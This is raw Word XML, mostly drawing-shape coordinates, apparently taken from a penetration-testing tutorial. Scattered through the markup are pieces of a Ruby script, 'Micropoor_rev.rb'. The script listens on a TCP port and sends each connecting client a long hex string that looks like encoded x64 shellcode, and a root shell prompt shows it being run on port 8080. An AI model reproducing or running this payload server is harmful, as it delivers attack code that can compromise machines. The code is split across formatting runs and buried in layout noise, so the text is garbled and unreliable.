        <v:shape style="position:absolute;left:3250;top:9030;width:130;height:270" coordorigin="3250,9030" coordsize="130,270" path="m3266,9059l3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3266,9059,3267,9059,3267,9059,3267,9059,3267,9059,3267,9059,3267,9059,3267,9059,3268,9059,3268,9059,3268,9059,3268,9059,3268,9059,3269,9059,3269,9059,3269,9059,3270,9059,3270,9059,3270,9059,3271,9059,3271,9059,3271,9059,3272,9059,3272,9059,3273,9059,3273,9059,3274,9059,3274,9059,3275,9059,3275,9059,3276,9059,3276,9059,3277,9059,3277,9059,3278,9059,3279,9059,3280,9059,3280,9059,3281,9059,3282,9059,3283,9059,3283,9059,3284,9059,3285,9059,3286,9059,3287,9059,3288,9059,3289,9059,3290,9059,3291,9059,3292,9059,3293,9059,3295,9059,3296,9059,3297,9059,3298,9059,3299,9059,3301,9059,3302,9059,3304,9059,3305,9059,3306,9059,3308,9059,3309,9059,3311,9059,3313,9059,3314,9059,3316,9059,3318,9059,3319,9059,3321,9059,3323,9059,3325,9059,3327,9059,3329,9059,3331,9059,3333,9059,3335,9059,3337,9059,3339,9059,3341,9059,3343,9059,3346,9059,3348,9059,3350,9059,3353,9059,3355,9059,3358,9059,3360,9059,3363,9059,3366,9059,3368,9059,3371,9059,3374,9059,3377,9059,3380,9059,3383,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9059,3386,9060,3386,9060,3386,9060,3386,9060,3386,9060,3386,9061,3386,9061,3386,9061,3386,9062,3386,9062,3386,9062,3386,9063,3386,9063,3386,9064,3386,9064,3386,9065,3386,9065,3386,9066,3386,9066,3386,9067,3386,9068,3386,9068,3386,9069,3386,9070,3386,9071,3386,9071,3386,9072,3386,9073,3386,9074,3386,9075,3386,9076,3386,9077,3386,9079,3386,9080,3386,9081,3386,9082,3386,9084,3386,9085,3386,9087,3386,9088,3386,9090,3386,9091,3386,9093,3386,9095,3386,9096,3386,9098,3386,9100,3386,9102,3386,9104,3386,9106,3386,9108,3386,9110,3386,9113,3386,9115,3386,9117,3386,9120,3386,9122,3386,9125,3386,9128,3386,9130,3386,9133,3386,9136,3386,9139,3386,9142,3386,9145,3386,9148,3386,9152,3386,9155,3386,9158,3386,9162,3386,9165,3386,9169,3386,9173,3386,9176,3386,9180,3386,9184,3386,9188,3386,9193,3386,9197,3386,9201,3386,9205,3386,9210,3386,9215,3386,9219,3386,9224,3386,9229,3386,9234,3386,9239,3386,9244,3386,9249,3386,9255,3386,9260,3386,9266,3386,9271,3386,9277,3386,9283,3386,9289,3386,9295,3386,9301,3386,9307,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3386,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3385,9314,3384,9314,3384,9314,3384,9314,3384,9314,3384,9314,3384,9314,3383,9314,3383,9314,3383,9314,3383,9314,3382,9314,3382,9314,3382,9314,3381,9314,3381,9314,3381,9314,3380,9314,3380,9314,3380,9314,3379,9314,3379,9314,3378,9314,3378,9314,3377,9314,3377,9314,3376,9314,3376,9314,3375,9314,3374,9314,3374,9314,3373,9314,3373,9314,3372,9314,3371,9314,3370,9314,3370,9314,3369,9314,3368,9314,3367,9314,3366,9314,3365,9314,3364,9314,3363,9314,3362,9314,3361,9314,3360,9314,3359,9314,3358,9314,3357,9314,3356,9314,3354,9314,3353,9314,3352,9314,3351,9314,3349,9314,3348,9314,3346,9314,3345,9314,3343,9314,3342,9314,3340,9314,3339,9314,3337,9314,3335,9314,3334,9314,3332,9314,3330,9314,3328,9314,3327,9314,3325,9314,3323,9314,3321,9314,3319,9314,3317,9314,3314,9314,3312,9314,3310,9314,3308,9314,3306,9314,3303,9314,3301,9314,3298,9314,3296,9314,3293,9314,3291,9314,3288,9314,3286,9314,3283,9314,3280,9314,3277,9314,3274,9314,3272,9314,3269,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9314,3266,9313,3266,9313,3266,9313,3266,9313,3266,9313,3266,9313,3266,9313,3266,9313,3266,9313,3266,9312,3266,9312,3266,9312,3266,9312,3266,9312,3266,9311,3266,9311,3266,9311,3266,9310,3266,9310,3266,9310,3266,9309,3266,9309,3266,9308,3266,9308,3266,9307,3266,9307,3266,9306,3266,9305,3266,9305,3266,9304,3266,9303,3266,9302,3266,9302,3266,9301,3266,9300,3266,9299,3266,9298,3266,9297,3266,9296,3266,9295,3266,9294,3266,9292,3266,9291,3266,9290,3266,9288,3266,9287,3266,9286,3266,9284,3266,9283,3266,9281,3266,9279,3266,9278,3266,9276,3266,9274,3266,9272,3266,9270,3266,9268,3266,9266,3266,9264,3266,9262,3266,9260,3266,9257,3266,9255,3266,9252,3266,9250,3266,9247,3266,9245,3266,9242,3266,9239,3266,9236,3266,9233,3266,9230,3266,9227,3266,9224,3266,9221,3266,9217,3266,9214,3266,9211,3266,9207,3266,9203,3266,9200,3266,9196,3266,9192,3266,9188,3266,9184,3266,9180,3266,9176,3266,9171,3266,9167,3266,9162,3266,9158,3266,9153,3266,9148,3266,9143,3266,9138,3266,9133,3266,9128,3266,9123,3266,9118,3266,9112,3266,9107,3266,9101,3266,9095,3266,9089,3266,9083,3266,9077,3266,9071,3266,9065,3266,9059e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:451.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,9030" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:9030;width:130;height:270" coordorigin="3730,9030" coordsize="130,270" path="m3746,9059l3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3746,9059,3747,9059,3747,9059,3747,9059,3747,9059,3747,9059,3747,9059,3747,9059,3747,9059,3748,9059,3748,9059,3748,9059,3748,9059,3748,9059,3749,9059,3749,9059,3749,9059,3749,9059,3750,9059,3750,9059,3750,9059,3751,9059,3751,9059,3752,9059,3752,9059,3752,9059,3753,9059,3753,9059,3754,9059,3754,9059,3755,9059,3755,9059,3756,9059,3756,9059,3757,9059,3758,9059,3758,9059,3759,9059,3760,9059,3761,9059,3761,9059,3762,9059,3763,9059,3764,9059,3765,9059,3765,9059,3766,9059,3767,9059,3768,9059,3769,9059,3770,9059,3771,9059,3772,9059,3774,9059,3775,9059,3776,9059,3777,9059,3778,9059,3780,9059,3781,9059,3782,9059,3784,9059,3785,9059,3787,9059,3788,9059,3790,9059,3791,9059,3793,9059,3794,9059,3796,9059,3798,9059,3800,9059,3801,9059,3803,9059,3805,9059,3807,9059,3809,9059,3811,9059,3813,9059,3815,9059,3817,9059,3819,9059,3821,9059,3824,9059,3826,9059,3828,9059,3831,9059,3833,9059,3836,9059,3838,9059,3841,9059,3843,9059,3846,9059,3849,9059,3851,9059,3854,9059,3857,9059,3860,9059,3863,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9059,3866,9060,3866,9060,3866,9060,3866,9060,3866,9060,3866,9061,3866,9061,3866,9061,3866,9062,3866,9062,3866,9062,3866,9063,3866,9063,3866,9064,3866,9064,3866,9065,3866,9065,3866,9066,3866,9066,3866,9067,3866,9068,3866,9068,3866,9069,3866,9070,3866,9071,3866,9071,3866,9072,3866,9073,3866,9074,3866,9075,3866,9076,3866,9077,3866,9079,3866,9080,3866,9081,3866,9082,3866,9084,3866,9085,3866,9087,3866,9088,3866,9090,3866,9091,3866,9093,3866,9095,3866,9096,3866,9098,3866,9100,3866,9102,3866,9104,3866,9106,3866,9108,3866,9110,3866,9113,3866,9115,3866,9117,3866,9120,3866,9122,3866,9125,3866,9128,3866,9130,3866,9133,3866,9136,3866,9139,3866,9142,3866,9145,3866,9148,3866,9152,3866,9155,3866,9158,3866,9162,3866,9165,3866,9169,3866,9173,3866,9176,3866,9180,3866,9184,3866,9188,3866,9193,3866,9197,3866,9201,3866,9205,3866,9210,3866,9215,3866,9219,3866,9224,3866,9229,3866,9234,3866,9239,3866,9244,3866,9249,3866,9255,3866,9260,3866,9266,3866,9271,3866,9277,3866,9283,3866,9289,3866,9295,3866,9301,3866,9307,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3866,9314,3865,9314,3865,9314,3865,9314,3865,9314,3865,9314,3865,9314,3865,9314,3865,9314,3865,9314,3864,9314,3864,9314,3864,9314,3864,9314,3864,9314,3863,9314,3863,9314,3863,9314,3863,9314,3862,9314,3862,9314,3862,9314,3861,9314,3861,9314,3861,9314,3860,9314,3860,9314,3859,9314,3859,9314,3859,9314,3858,9314,3858,9314,3857,9314,3856,9314,3856,9314,3855,9314,3855,9314,3854,9314,3853,9314,3853,9314,3852,9314,3851,9314,3851,9314,3850,9314,3849,9314,3848,9314,3847,9314,3846,9314,3845,9314,3845,9314,3844,9314,3843,9314,3842,9314,3840,9314,3839,9314,3838,9314,3837,9314,3836,9314,3835,9314,3833,9314,3832,9314,3831,9314,3829,9314,3828,9314,3827,9314,3825,9314,3824,9314,3822,9314,3821,9314,3819,9314,3817,9314,3816,9314,3814,9314,3812,9314,3810,9314,3809,9314,3807,9314,3805,9314,3803,9314,3801,9314,3799,9314,3797,9314,3795,9314,3793,9314,3790,9314,3788,9314,3786,9314,3783,9314,3781,9314,3779,9314,3776,9314,3774,9314,3771,9314,3769,9314,3766,9314,3763,9314,3760,9314,3758,9314,3755,9314,3752,9314,3749,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9314,3746,9313,3746,9313,3746,9313,3746,9313,3746,9313,3746,9313,3746,9313,3746,9313,3746,9313,3746,9312,3746,9312,3746,9312,3746,9312,3746,9312,3746,9311,3746,9311,3746,9311,3746,9310,3746,9310,3746,9310,3746,9309,3746,9309,3746,9308,3746,9308,3746,9307,3746,9307,3746,9306,3746,9305,3746,9305,3746,9304,3746,9303,3746,9302,3746,9302,3746,9301,3746,9300,3746,9299,3746,9298,3746,9297,3746,9296,3746,9295,3746,9294,3746,9292,3746,9291,3746,9290,3746,9288,3746,9287,3746,9286,3746,9284,3746,9283,3746,9281,3746,9279,3746,9278,3746,9276,3746,9274,3746,9272,3746,9270,3746,9268,3746,9266,3746,9264,3746,9262,3746,9260,3746,9257,3746,9255,3746,9252,3746,9250,3746,9247,3746,9245,3746,9242,3746,9239,3746,9236,3746,9233,3746,9230,3746,9227,3746,9224,3746,9221,3746,9217,3746,9214,3746,9211,3746,9207,3746,9203,3746,9200,3746,9196,3746,9192,3746,9188,3746,9184,3746,9180,3746,9176,3746,9171,3746,9167,3746,9162,3746,9158,3746,9153,3746,9148,3746,9143,3746,9138,3746,9133,3746,9128,3746,9123,3746,9118,3746,9112,3746,9107,3746,9101,3746,9095,3746,9089,3746,9083,3746,9077,3746,9071,3746,9065,3746,9059e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:451.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,9030" coordsize="130,270">
        <v:shape style="position:absolute;left:4210;top:9030;width:130;height:270" coordorigin="4210,9030" coordsize="130,270" path="m4226,9059l4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4226,9059,4227,9059,4227,9059,4227,9059,4227,9059,4227,9059,4227,9059,4227,9059,4227,9059,4227,9059,4228,9059,4228,9059,4228,9059,4228,9059,4228,9059,4228,9059,4229,9059,4229,9059,4229,9059,4229,9059,4230,9059,4230,9059,4230,9059,4231,9059,4231,9059,4231,9059,4232,9059,4232,9059,4233,9059,4233,9059,4234,9059,4234,9059,4235,9059,4235,9059,4236,9059,4236,9059,4237,9059,4237,9059,4238,9059,4239,9059,4239,9059,4240,9059,4241,9059,4242,9059,4242,9059,4243,9059,4244,9059,4245,9059,4246,9059,4247,9059,4248,9059,4249,9059,4250,9059,4251,9059,4252,9059,4253,9059,4254,9059,4255,9059,4256,9059,4257,9059,4259,9059,4260,9059,4261,9059,4263,9059,4264,9059,4265,9059,4267,9059,4268,9059,4270,9059,4271,9059,4273,9059,4275,9059,4276,9059,4278,9059,4280,9059,4282,9059,4283,9059,4285,9059,4287,9059,4289,9059,4291,9059,4293,9059,4295,9059,4297,9059,4300,9059,4302,9059,4304,9059,4306,9059,4309,9059,4311,9059,4313,9059,4316,9059,4318,9059,4321,9059,4324,9059,4326,9059,4329,9059,4332,9059,4334,9059,4337,9059,4340,9059,4343,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9059,4346,9060,4346,9060,4346,9060,4346,9060,4346,9060,4346,9061,4346,9061,4346,9061,4346,9062,4346,9062,4346,9062,4346,9063,4346,9063,4346,9064,4346,9064,4346,9065,4346,9065,4346,9066,4346,9066,4346,9067,4346,9068,4346,9068,4346,9069,4346,9070,4346,9071,4346,9071,4346,9072,4346,9073,4346,9074,4346,9075,4346,9076,4346,9077,4346,9079,4346,9080,4346,9081,4346,9082,4346,9084,4346,9085,4346,9087,4346,9088,4346,9090,4346,9091,4346,9093,4346,9095,4346,9096,4346,9098,4346,9100,4346,9102,4346,9104,4346,9106,4346,9108,4346,9110,4346,9113,4346,9115,4346,9117,4346,9120,4346,9122,4346,9125,4346,9128,4346,9130,4346,9133,4346,9136,4346,9139,4346,9142,4346,9145,4346,9148,4346,9152,4346,9155,4346,9158,4346,9162,4346,9165,4346,9169,4346,9173,4346,9176,4346,9180,4346,9184,4346,9188,4346,9193,4346,9197,4346,9201,4346,9205,4346,9210,4346,9215,4346,9219,4346,9224,4346,9229,4346,9234,4346,9239,4346,9244,4346,9249,4346,9255,4346,9260,4346,9266,4346,9271,4346,9277,4346,9283,4346,9289,4346,9295,4346,9301,4346,9307,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4346,9314,4345,9314,4345,9314,4345,9314,4345,9314,4345,9314,4345,9314,4345,9314,4344,9314,4344,9314,4344,9314,4344,9314,4344,9314,4343,9314,4343,9314,4343,9314,4343,9314,4342,9314,4342,9314,4342,9314,4341,9314,4341,9314,4341,9314,4340,9314,4340,9314,4339,9314,4339,9314,4338,9314,4338,9314,4337,9314,4337,9314,4336,9314,4336,9314,4335,9314,4334,9314,4334,9314,4333,9314,4332,9314,4332,9314,4331,9314,4330,9314,4329,9314,4328,9314,4328,9314,4327,9314,4326,9314,4325,9314,4324,9314,4323,9314,4322,9314,4321,9314,4320,9314,4318,9314,4317,9314,4316,9314,4315,9314,4314,9314,4312,9314,4311,9314,4310,9314,4308,9314,4307,9314,4305,9314,4304,9314,4302,9314,4301,9314,4299,9314,4298,9314,4296,9314,4294,9314,4292,9314,4291,9314,4289,9314,4287,9314,4285,9314,4283,9314,4281,9314,4279,9314,4277,9314,4275,9314,4273,9314,4271,9314,4268,9314,4266,9314,4264,9314,4261,9314,4259,9314,4256,9314,4254,9314,4251,9314,4249,9314,4246,9314,4243,9314,4241,9314,4238,9314,4235,9314,4232,9314,4229,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9314,4226,9313,4226,9313,4226,9313,4226,9313,4226,9313,4226,9313,4226,9313,4226,9313,4226,9313,4226,9312,4226,9312,4226,9312,4226,9312,4226,9312,4226,9311,4226,9311,4226,9311,4226,9310,4226,9310,4226,9310,4226,9309,4226,9309,4226,9308,4226,9308,4226,9307,4226,9307,4226,9306,4226,9305,4226,9305,4226,9304,4226,9303,4226,9302,4226,9302,4226,9301,4226,9300,4226,9299,4226,9298,4226,9297,4226,9296,4226,9295,4226,9294,4226,9292,4226,9291,4226,9290,4226,9288,4226,9287,4226,9286,4226,9284,4226,9283,4226,9281,4226,9279,4226,9278,4226,9276,4226,9274,4226,9272,4226,9270,4226,9268,4226,9266,4226,9264,4226,9262,4226,9260,4226,9257,4226,9255,4226,9252,4226,9250,4226,9247,4226,9245,4226,9242,4226,9239,4226,9236,4226,9233,4226,9230,4226,9227,4226,9224,4226,9221,4226,9217,4226,9214,4226,9211,4226,9207,4226,9203,4226,9200,4226,9196,4226,9192,4226,9188,4226,9184,4226,9180,4226,9176,4226,9171,4226,9167,4226,9162,4226,9158,4226,9153,4226,9148,4226,9143,4226,9138,4226,9133,4226,9128,4226,9123,4226,9118,4226,9112,4226,9107,4226,9101,4226,9095,4226,9089,4226,9083,4226,9077,4226,9071,4226,9065,4226,9059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client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write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"4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f74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8315827482df8ffffffe2f4ce2efc2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81e4575f732663e9daffdeba6642e4e1e8be532a552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2ef49ef6e532a5122ef4bebee5b640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782c32fd27e588379e5a1eb0ec8199b6f3af728def6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c5b1a60272e8465ff997c705a37cd3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ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6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0baba6ac69a7b92e678865ed99be33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b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7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83e3f277e0dd64dcc067e6533e8e6e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8802647be278865ed9dbe33b6198d65a1f1b3b92663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85ef7df87c36ee37cd3eece1b66a38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2696aff5f8ae733c374f028df8a5cd86278db7f7f17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c208f34331152e4be8c110cfeb19e8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bf732272985674bf176dec67ecceee430127bda7dcc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ee98795f33623e98a7245dbbbb973e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76a2da9ff0cdb3334504c5b8f63266268d5484399c3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299aaa6e4ece7a7622b4e05a39c79b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fcda637452ce546377aefbe8d5447b628d299aa8467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6ad3e7733e33450ce5300e73dce669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9acc4622b7a60bc6a7527782d78eeccceeadf174de7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637450ce0883e58623e94a62440b68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864a604b1526c74ca660199a62e7dd76cef89a6aeec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e09f32767fccaff5f17ec02e4e05af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17e15361838019a6247abebba132fd27e430077aefa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5846754f84d30bfb79311783a0f321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b5794affae09f32267fccaff5d3f76827c5c7c1a289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08e731268d54d8d7ba5399aa851163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50cbcd998084ef6ef1def42efa3a9b19f808d53e15c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cb7e47e35c2d3dd9a1178b9f7"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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="115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client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close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9383" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="19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-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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17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socket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TCPServer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new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'0.0.0.0'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PORT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626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puts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"Listening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11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#{PORT}.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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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20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0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>while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client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socket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accept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Thread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{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handle_connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17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client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}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9383" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="19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-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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24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root@John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var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www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html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#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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ruby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./Micropoor_rev.rb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e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8080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7582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Listening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11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8080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27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658.556pt;width:0.0pt;height:183.443pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,13171" coordsize="0,3668">
        <v:shape style="position:absolute;left:10402;top:13171;width:0;height:3668" coordorigin="10402,13171" coordsize="0,3668" path="m10402,13171l10402,13171,10402,13171,10402,13171,10402,13171,10402,13171,10402,13171,10402,13171,10402,13171,10402,13172,10402,13172,10402,13173,10402,13174,10402,13174,10402,13175,10402,13177,10402,13178,10402,13180,10402,13181,10402,13183,10402,13186,10402,13188,10402,13191,10402,13194,10402,13197,10402,13201,10402,13205,10402,13209,10402,13213,10402,13218,10402,13224,10402,13229,10402,13235,10402,13242,10402,13249,10402,13256,10402,13264,10402,13272,10402,13281,10402,13290,10402,13300,10402,13310,10402,13321,10402,13332,10402,13344,10402,13356,10402,13369,10402,13383,10402,13397,10402,13411,10402,13427,10402,13443,10402,13459,10402,13477,10402,13495,10402,13513,10402,13533,10402,13553,10402,13574,10402,13595,10402,13618,10402,13641,10402,13665,10402,13690,10402,13715,10402,13741,10402,13769,10402,13797,10402,13825,10402,13855,10402,13886,10402,13917,10402,13950,10402,13983,10402,14018,10402,14053,10402,14089,10402,14126,10402,14165,10402,14204,10402,14244,10402,14285,10402,14328,10402,14371,10402,14416,10402,14461,10402,14508,10402,14555,10402,14604,10402,14654,10402,14705,10402,14758,10402,14811,10402,14866,10402,14922,10402,14979,10402,15037,10402,15097,10402,15158,10402,15220,10402,15283,10402,15348,10402,15414,10402,15481,10402,15550,10402,15620,10402,15691,10402,15764,10402,15838,10402,15913,10402,15990,10402,16068,10402,16148,10402,16229,10402,16312,10402,16396,10402,16482,10402,16569,10402,16658,10402,16748,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:657.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13150" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:13150;width:8990;height:410" coordorigin="1490,13150" coordsize="8990,410" path="m1510,13171l1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1510,13171,1511,13171,1512,13171,1512,13171,1514,13171,1515,13171,1517,13171,1519,13171,1521,13171,1524,13171,1528,13171,1532,13171,1536,13171,1541,13171,1546,13171,1552,13171,1559,13171,1566,13171,1575,13171,1583,13171,1593,13171,1603,13171,1615,13171,1627,13171,1640,13171,1654,13171,1668,13171,1684,13171,1701,13171,1719,13171,1738,13171,1758,13171,1780,13171,1802,13171,1826,13171,1851,13171,1877,13171,1904,13171,1933,13171,1963,13171,1995,13171,2028,13171,2063,13171,2099,13171,2136,13171,2175,13171,2216,13171,2259,13171,2303,13171,2348,13171,2396,13171,2445,13171,2496,13171,2549,13171,2604,13171,2660,13171,2719,13171,2779,13171,2841,13171,2906,13171,2972,13171,3041,13171,3112,13171,3184,13171,3259,13171,3336,13171,3416,13171,3498,13171,3582,13171,3668,13171,3757,13171,3848,13171,3941,13171,4037,13171,4136,13171,4236,13171,4340,13171,4446,13171,4555,13171,4666,13171,4780,13171,4897,13171,5017,13171,5139,13171,5264,13171,5392,13171,5523,13171,5657,13171,5793,13171,5933,13171,6076,13171,6222,13171,6370,13171,6522,13171,6677,13171,6835,13171,6997,13171,7161,13171,7329,13171,7500,13171,7675,13171,7853,13171,8034,13171,8219,13171,8407,13171,8598,13171,8793,13171,8992,13171,9194,13171,9400,13171,9609,13171,9823,13171,10039,13171,10260,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13171,10484,13172,10484,13172,10484,13172,10484,13172,10484,13172,10484,13173,10484,13173,10484,13173,10484,13174,10484,13174,10484,13175,10484,13175,10484,13176,10484,13176,10484,13177,10484,13178,10484,13178,10484,13179,10484,13180,10484,13181,10484,13181,10484,13182,10484,13183,10484,13184,10484,13185,10484,13187,10484,13188,10484,13189,10484,13190,10484,13192,10484,13193,10484,13195,10484,13196,10484,13198,10484,13200,10484,13201,10484,13203,10484,13205,10484,13207,10484,13209,10484,13211,10484,13214,10484,13216,10484,13218,10484,13221,10484,13223,10484,13226,10484,13229,10484,13231,10484,13234,10484,13237,10484,13240,10484,13243,10484,13247,10484,13250,10484,13254,10484,13257,10484,13261,10484,13264,10484,13268,10484,13272,10484,13276,10484,13281,10484,13285,10484,13289,10484,13294,10484,13298,10484,13303,10484,13308,10484,13313,10484,13318,10484,13323,10484,13328,10484,13334,10484,13339,10484,13345,10484,13351,10484,13357,10484,13363,10484,13369,10484,13375,10484,13382,10484,13389,10484,13395,10484,13402,10484,13409,10484,13416,10484,13424,10484,13431,10484,13439,10484,13446,10484,13454,10484,13462,10484,13470,10484,13479,10484,13487,10484,13496,10484,13505,10484,13514,10484,13523,10484,13532,10484,13541,10484,13551,10484,13561,10484,13561,10484,13561,10484,13561,10484,13561,10484,13561,10484,13561,10483,13561,10482,13561,10482,13561,10480,13561,10479,13561,10477,13561,10475,13561,10473,13561,10470,13561,10466,13561,10462,13561,10458,13561,10453,13561,10448,13561,10442,13561,10435,13561,10428,13561,10419,13561,10411,13561,10401,13561,10391,13561,10379,13561,10367,13561,10354,13561,10340,13561,10326,13561,10310,13561,10293,13561,10275,13561,10256,13561,10236,13561,10215,13561,10192,13561,10168,13561,10143,13561,10117,13561,10090,13561,10061,13561,10031,13561,9999,13561,9966,13561,9931,13561,9895,13561,9858,13561,9819,13561,9778,13561,9735,13561,9691,13561,9646,13561,9598,13561,9549,13561,9498,13561,9445,13561,9391,13561,9334,13561,9275,13561,9215,13561,9153,13561,9088,13561,9022,13561,8953,13561,8883,13561,8810,13561,8735,13561,8658,13561,8578,13561,8497,13561,8413,13561,8326,13561,8238,13561,8146,13561,8053,13561,7957,13561,7859,13561,7758,13561,7654,13561,7548,13561,7439,13561,7328,13561,7214,13561,7097,13561,6977,13561,6855,13561,6730,13561,6602,13561,6471,13561,6337,13561,6201,13561,6061,13561,5918,13561,5773,13561,5624,13561,5472,13561,5317,13561,5159,13561,4997,13561,4833,13561,4665,13561,4494,13561,4319,13561,4141,13561,3960,13561,3776,13561,3587,13561,3396,13561,3201,13561,3002,13561,2800,13561,2594,13561,2385,13561,2172,13561,1955,13561,1734,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13561,1510,13560,1510,13560,1510,13560,1510,13560,1510,13560,1510,13560,1510,13559,1510,13559,1510,13559,1510,13559,1510,13558,1510,13558,1510,13558,1510,13557,1510,13557,1510,13556,1510,13556,1510,13555,1510,13555,1510,13554,1510,13553,1510,13553,1510,13552,1510,13551,1510,13550,1510,13549,1510,13548,1510,13547,1510,13546,1510,13545,1510,13544,1510,13542,1510,13541,1510,13540,1510,13538,1510,13537,1510,13535,1510,13534,1510,13532,1510,13530,1510,13528,1510,13526,1510,13524,1510,13522,1510,13520,1510,13518,1510,13516,1510,13513,1510,13511,1510,13508,1510,13506,1510,13503,1510,13500,1510,13497,1510,13494,1510,13491,1510,13488,1510,13485,1510,13481,1510,13478,1510,13474,1510,13471,1510,13467,1510,13463,1510,13459,1510,13455,1510,13451,1510,13447,1510,13442,1510,13438,1510,13433,1510,13428,1510,13424,1510,13419,1510,13414,1510,13408,1510,13403,1510,13398,1510,13392,1510,13386,1510,13381,1510,13375,1510,13369,1510,13362,1510,13356,1510,13350,1510,13343,1510,13336,1510,1332